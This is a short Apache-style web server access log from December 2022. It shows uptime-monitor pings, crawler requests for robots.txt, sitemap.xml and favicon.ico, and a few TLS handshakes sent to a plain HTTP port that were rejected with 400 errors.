107.150.127.138 - - [02/Dec/2022:13:18:57 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:18:59 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2022:13:19:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:20:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2022:13:21:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.89.208.18 - - [02/Dec/2022:13:22:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
212.91.246.72 - - [02/Dec/2022:13:22:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.150.127.138 - - [02/Dec/2022:13:23:32 +0100] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2022:13:23:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.150.127.138 - - [02/Dec/2022:13:24:04 +0100] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:24:05 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:24:07 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:24:11 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:24:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:24:22 +0100] "\x16\x03\x01\x01\t\x01" 400 329 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:24:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
107.150.127.138 - - [02/Dec/2022:13:24:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:24:42 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
107.150.127.138 - - [02/Dec/2022:13:24:46 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2022:13:24:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
107.150.127.138 - - [02/Dec/2022:13:24:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
